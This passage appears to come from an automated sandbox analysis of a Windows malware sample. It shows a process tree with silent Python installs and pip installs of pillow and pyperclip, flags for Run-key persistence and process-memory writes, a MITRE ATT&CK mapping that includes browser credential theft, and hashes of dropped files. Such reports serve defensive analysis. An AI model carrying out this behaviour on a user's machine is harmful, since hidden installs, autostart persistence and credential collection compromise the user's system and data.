    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:6080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "pip install pillow"
  2⤵
  PID:1932
- C:\Users\Admin\AppData\Local\Temp\python-installer.exe
  C:\Users\Admin\AppData\Local\Temp\python-installer.exe /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:5608
- - C:\Windows\Temp\{BD1E9A64-A203-40CA-BCE1-E336CFD2F37B}\.cr\python-installer.exe
    "C:\Windows\Temp\{BD1E9A64-A203-40CA-BCE1-E336CFD2F37B}\.cr\python-installer.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Temp\python-installer.exe" -burn.filehandle.attached=532 -burn.filehandle.self=544 /quiet InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - System Location Discovery: System Language Discovery
    - Modifies registry class
    - Suspicious use of AdjustPrivilegeToken
    PID:2172
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "pip install pyperclip"
  2⤵
  PID:1420

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /burn.runonce
1⤵
- Suspicious use of WriteProcessMemory
PID:5664
- C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe
  "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /burn.runonce
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:1252
- - C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe
    "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /quiet /burn.log.append "C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250406035805.log" InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2312
  - - C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe
      "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" -burn.clean.room="C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" -burn.filehandle.attached=520 -burn.filehandle.self=540 /quiet /burn.log.append "C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250406035805.log" InstallAllUsers=0 PrependPath=1 Include_test=0 Include_pip=1 Include_doc=0
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Adds Run key to start application
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:6128

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
1⤵
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\python-3.12.6-amd64.exe" /burn.runonce
1⤵
PID:536

C:\Windows\system32\LogonUI.exe
"LogonUI.exe" /flags:0x4 /state0:0xa392f055 /state1:0x41c64e6d
1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1848

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Config.Msi\e57b4fb.rbs

Filesize
8KB

MD5
6b489d51f77f16036d7afb13773a1a40

SHA1
eeb2d1c351f5e0d33e28555f71c7317b4e892bc3

SHA256
bb26972d56528895d6a4591e5704b5749ad74b41c670f800487998249d75c98f

SHA512
77d85f92467700befd7a4f72b978eaca3ed73ae26b979fe4bc31995fd327bfb60e068b86a3f335588d65c6afebe5c324e895175d8b3b0625b2e99b3c331671ef

Download Submit
C:\Config.Msi\e57b4ff.rbs

Filesize
8KB

MD5
8b55650f442d0a7a10d0f1462cce6de9

SHA1
05f527d24f9d76d4142cf3e10aed32b804045258

SHA256
18a55bc5e00173b4c5fe66ff223f8b84591fdc7d39826e6507bf9293113f7f86

SHA512
bfe72ede95cce40cdc799d56b1ae80a1accaabf346c532b69f2d5c8812a2a8f3dcf7d710e7ac0bfa24f5930ba7bb45a06502cefd2502839dff182ce9a6b1143f

Download Submit
C:\Config.Msi\e57b500.rbf

Filesize
66KB

MD5
5eace36402143b0205635818363d8e57

SHA1
ae7b03251a0bac083dec3b1802b5ca9c10132b4c

SHA256
25a39e721c26e53bec292395d093211bba70465280acfa2059fa52957ec975b2

SHA512
7cb3619ea46fbaaf45abfa3d6f29e7a5522777980e0a9d2da021d6c68bcc380abe38e8004e1f31d817371fb3cdd5425d4bb115cb2dc0d40d59d111a2d98b21d4

Download Submit
C:\Config.Msi\e57b501.rbf

Filesize
6.6MB

MD5
166cc2f997cba5fc011820e6b46e8ea7

SHA1
d6179213afea084f02566ea190202c752286ca1f

SHA256
c045b57348c21f5f810bae60654ae39490846b487378e917595f1f95438f9546

SHA512
49d9d4df3d7ef5737e947a56e48505a2212e05fdbcd7b83d689639728639b7fd3be39506d7cfcb7563576ebee879fd305370fdb203909ed9b522b894dd87aacb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f48896adf9a23882050cdff97f610a7f

SHA1
4c5a610df62834d43f470cae7e851946530e3086

SHA256
3ae35c2828715a2f9a5531d334a0cfffc81396c2dc058ca42a9943f3cdc22e78

SHA512
16644246f2a35a186fcb5c2b6456ed6a16e8db65ad1383109e06547f9b1f9358f071c30cca541ca4cf7bae66cb534535e88f75f6296a4bfc6c7b22b0684a6ba9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5cf56ad3b674b713eada82594f0e482c

SHA1
18e9313b2f48a010e4139b5b53a145f7bb72dfbe

SHA256
a5647b1d97a7c8f20ec05f80df732d91cd647b286a0ed5a5c05e366f558809ff

SHA512
db03ea2b089e15a022755d3c59fcce65bb6147b83ae10e95fb40242fcddadaa13e1ab67dbfede5dc064a97108033ff52e1caef5077ee3092acefd98e145b4240

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
5d88ec3bf4f51dcc374b34083b6f8df9

SHA1
2a6e30182ac6c447334b1f593283fa6bba1de3e1

SHA256
7fe380461a16877bad9b3aef24e441075ca28e1bfdec85b6a153cbb55070713d

SHA512
fb3f209f96d7549cbd4aa14d2416611dc1db106cd550cec732109cdda949e0cff71dbaad6511e774ffe863d5b91e2bc5725c3e84619b24f15901f6eddae4c37b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5de709937b5f831ebb81a1bf76def987

SHA1
3918eccc7c40002579ca1338d37b1f18c31e8fb9

SHA256
83292ac2a487eb9ce87470a85b69ce31aaf9bcbb9ff15188b9d38eadc5cfd7b1

SHA512
933267037b548a14484b888d65b1988a35af9c189b65868d780fa120282287d78c49ce0058bfba7246bf783da36303585963fba21c262d6da585798397566bba

Download Submit
C:\Users\Admin\AppData\Local\Package Cache\.unverified\lib_JustForMe

Filesize
7.1MB

MD5
f6ddadd0d817ce569e202e57863ae919

SHA1
3a2f6d81c895f573464d378ab3bcfb6d8a48eaf2

SHA256
63032d6386c94e83a3b7b7b9eefc23493f976bd435a10668aa263d1ca1cb22e1

SHA512
7d970e62e3b513b2fa98e8a83ce3080fc6652bba2b70a5127a46ca5c2b0dee8790e48fffef56d15bec2706a997ade5a3c05ff5df4c6be2b3632b6bf7aa6e9ef2

Download Submit
C:\Users\Admin\AppData\Local\Package Cache\.unverified\tcltk_JustForMe

Filesize
3.4MB

MD5
fd7e13f2c36fe528afc7a05892b34695

SHA1
14a9c4dfd12e1f9b1e64e110166500be1ef0abb1

SHA256
2a24729e58bce7c2abde7225dc2de32539b4c4ef3609b53b54f643955d01c4b0

SHA512
7b7060672f680c418f7ebbddf2ba693539b1284566ab756c8061b61a582d13537aa215dad03db5c803eeba2f6fcc7fad7ed2857931ea205048abd905afef1d4f

Download Submit
C:\Users\Admin\AppData\Local\Package Cache\{2F4E9933-7587-4D85-9BA1-F2903AFB36D8}v3.12.6150.0\dev.msi

Filesize
384KB

MD5
dc49359c176d731fef03fc51ed13c959

SHA1
3d9348460f2300faeefe1e1e3787c55e71ff0aad

SHA256
04f38bdd910eabe114dde5e321cdcbf831c6373da9d27d791b96e09cd96f5417

SHA512
5044e4b30919e0d30502162539069014fcf2a4061f9a75a1956202231d98eba985fa7234694f70fae7d3defde2f9f41e97e821e74bda66107a9f452002768793

Download Submit
C:\Users\Admin\AppData\Local\Package Cache\{316e3b12-1191-47df-b9d4-dcf0bf2f6cc4}\state.rsm

Filesize
1KB

MD5
4ff13b4ac1f85e3c5902dad5ad55e8c5

SHA1
881781d63fc166bfb6f3b9396e065e09c49b982a

SHA256
3484aa58dce2181af261624d0e98267ab237aabccc6597e87305f4366729c547

SHA512
6597914b1470a3a5ff1b3c90272a9977a9d2fabdb320ee14a2f4aec4d6fb3fb90a978fc606f1bee7127595bfb61695e94635f1a25e88c259ef2a4319f3608ade

Download Submit
C:\Users\Admin\AppData\Local\Package Cache\{3C524136-E47A-45C7-BB2C-242EAC3F4C32}v3.12.6150.0\path.msi

Filesize
48KB

MD5
3795cc956438ebab0af54f62f5267f42

SHA1
03db07d69d2e84c1db1397173f027eb96181d8fb

SHA256
3acb37c76d4aad92f5f0d6b00195f76e27513839121ada3b9bb8ab69c1bf612b

SHA512
4af037b570486b23fe4a283fd4918759c18763716e50da21559d5ad5d0727ef1af178f0190bb2fe6d31d3b702c938ad45a78fe690a527ef4cb425da1652e3bf7

Download Submit
C:\Users\Admin\AppData\Local\Package Cache\{901B913C-FA63-48D2-9842-7D7676739378}v3.12.6150.0\core.msi

Filesize
1.9MB

MD5
d4c1f834f30032f220409a17e0f688cd

SHA1
61dc90b164c3797456a8ed775b353a087054fd0f

SHA256
675c023e78eaed980638a969feaaa07c52a5a604d89e81434e6c462f17eebc12

SHA512
b7e97a5fab185b5d9150e07e1707aca21285ae62d4a25997040349eab78a2ad2f9a555980bb221a3a91120651c04a5df0909387e8931e76094de41f7697b124f

Download Submit
C:\Users\Admin\AppData\Local\Package Cache\{FE223D83-99B9-41D5-99FC-FA3995D8F82D}v3.12.6150.0\launcher.msi

Filesize
540KB

MD5
19a9b32681e73706fdf1cfd09317476f

SHA1
f10f1a1fd4c5ad61772606d682aeb6b94cd44083

SHA256
154af6e113878084ad1405e0e5837c74ac2855046aeaeb7866c35316c13121e4

SHA512
d8c81867596f73aac24092d140d679ee3422ec3f739aa8b8598023118065f3a2706a8c3bbc8fc84e27d3fdbed0d3edd44969be81b875358e238a50e239dc952e

Download Submit
C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250406035805.log

Filesize
65KB

MD5
9fc7ce00b45aa088e5a08bf5170667fe

SHA1
328c249371589f8089a14dbe517f44df74004ca9

SHA256
1668345d17445a314f42388424d1c1768cba536a2c6cee5941adbd8de13d93eb

SHA512
57d7b0f96d181900a86944347ab7b61278f6c33ffd1fc187d87cd6c987e9bd780cbb857cc02b133def9a26a0edf0202ef669313157d839ff3edc6e2be3aef2e5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250406035805_000_core_JustForMe.log

Filesize
3KB

MD5
76e8547356e48bcdd6fed8a0c3db15fe

SHA1
c20a58e19b4730416a4a66113e3e4ddda0204dcf

SHA256
c5902e2f46ba91964365eb5a97ba83c400b52ad82ed9520a5ec73b4c3029dbbd

SHA512
6beb5317d8c4b6ea0b626229245a0582c3e1bf62fe4c2df4636782730fd1c3996d8c933e57cff54d2529e82fb7dc1fa272ed2bdb5ad6a6c561d1462b5a148a54

Download Submit
C:\Users\Admin\AppData\Local\Temp\Python 3.12.6 (64-bit)_20250406035805_000_core_JustForMe_rollback.log

Filesize
1KB

MD5
05267a9195695681bc7616364e075a04

SHA1
09d694217e8d23f7bff3c543672892161ea9b52a

SHA256
b5087a42301c48a70b51f41d445f7bbee2486f1237e16514eb9e241abd3378bd

SHA512
9e372994d148e64617c4af34f134f199ecd07dda874560abae612190da46969f9768480f9094f30de0b78c078adc8b34c1e1f484e509d60b281e0cce59b87399

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_21xx2omd.quo.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\pkg\f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c\sqlite3\build\Release\node_sqlite3.node

Filesize
1.8MB

MD5
66a65322c9d362a23cf3d3f7735d5430

SHA1
ed59f3e4b0b16b759b866ef7293d26a1512b952e

SHA256
f806f89dc41dde00ca7124dc1e649bdc9b08ff2eff5c891b764f3e5aefa9548c

SHA512
0a44d12852fc4c74658a49f886c4bc7c715c48a7cb5a3dcf40c9f1d305ca991dd2c2cb3d0b5fd070b307a8f331938c5213188cbb2d27d47737cc1c4f34a1ea21

Download Submit
C:\Users\Admin\AppData\Local\Temp\python-installer.exe

Filesize
25.3MB

MD5
d8548aa7609a762ba66f62eeb2ca862d

SHA1
2eb85b73cab52693d3a27446b7de1c300cc05655

SHA256
5914748e6580e70bedeb7c537a0832b3071de9e09a2e4e7e3d28060616045e0a

SHA512
37fa7250b10b0c03b87d800bf4f920589649309cb4fbd25864475084bb7873d62b809a4fdeabd06c79f03f33614218eb7e01a9bd796de29dd3b141f1906d588c

Download Submit
C:\Windows\Temp\{BD1E9A64-A203-40CA-BCE1-E336CFD2F37B}\.cr\python-installer.exe

Filesize
858KB

MD5
931227a65a32cebf1c10a99655ad7bbd

SHA1
1b874fdef892a2af2501e1aaea3fcafb4b4b00c6

SHA256
1dcf770dc47264f7495a559f786a4428f3a97f9d81e4c466ec9a5636f5a1be6d

SHA512
0212b5adc6ee8893edf4b94272fdffe145f53fe31357a3e024543f434cdc022a915d76780c1103aa9948feca5f161cfae608f91f3c7a876569e91c05d690d507

Download Submit
C:\Windows\Temp\{D5797759-25AD-4DD4-89FE-5FC94D69434A}\.ba\PythonBA.dll

Filesize
675KB

MD5
8c8e5a5ca0483abdc6ad6ef22c73b5d2

SHA1
9b7345ab1b60bb3fb37c9dc7f331155b4441e4dc

SHA256
edc6db3712eb4e1cd6988bc7b42c467ac6901148f3ee4bdfb286eff26efbfd43

SHA512
861ad726872b58e5b8b7c580b485e7bde0be6c1963ac23db63d4105684d1e50e8f409cd329f183d252a52e2be2737efaf9e4413eff29deee75b87850664b3157

Download Submit
C:\Windows\Temp\{D5797759-25AD-4DD4-89FE-5FC94D69434A}\.ba\SideBar.png

Filesize
50KB

MD5
888eb713a0095756252058c9727e088a

SHA1
c14f69f2bef6bc3e2162b4dd78e9df702d94cdb4

SHA256
79434bd1368f47f08acf6db66638531d386bf15166d78d9bfea4da164c079067

SHA512
7c59f4ada242b19c2299b6789a65a1f34565fed78730c22c904db16a9872fe6a07035c6d46a64ee94501fbcd96de586a8a5303ca22f33da357d455c014820ca0

Download Submit
C:\Windows\Temp\{D5797759-25AD-4DD4-89FE-5FC94D69434A}\pip_JustForMe

Filesize
268KB

MD5
494f112096b61cb01810df0e419fb93c

SHA1
295c32c8e1654810c4807e42ba2438c8da39756a

SHA256
2a1f085a0ad75d5b332fb0fe9e1a40146c311e8e524e898a09ca40157619fa80

SHA512
9c8ec8fcc5d74b5022cd170677b62dfedbc187fde1dd296bdb9733bec03e18674a385928c8827a4ce1864433d50e8598228a6d2198aef2937c0dcc0d8f4ea704

Download Submit
memory/2312-456-0x0000000000600000-0x0000000000689000-memory.dmp

Filesize
548KB

Download
memory/5048-82-0x000001D5ADC80000-0x000001D5ADCA2000-memory.dmp

Filesize
136KB

Download
memory/5048-83-0x000001D5AE070000-0x000001D5AE0C0000-memory.dmp

Filesize
320KB

Download
memory/6128-455-0x0000000000600000-0x0000000000689000-memory.dmp

Filesize
548KB

Download

Resubmissions

Analysis

Sharing

Errors

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads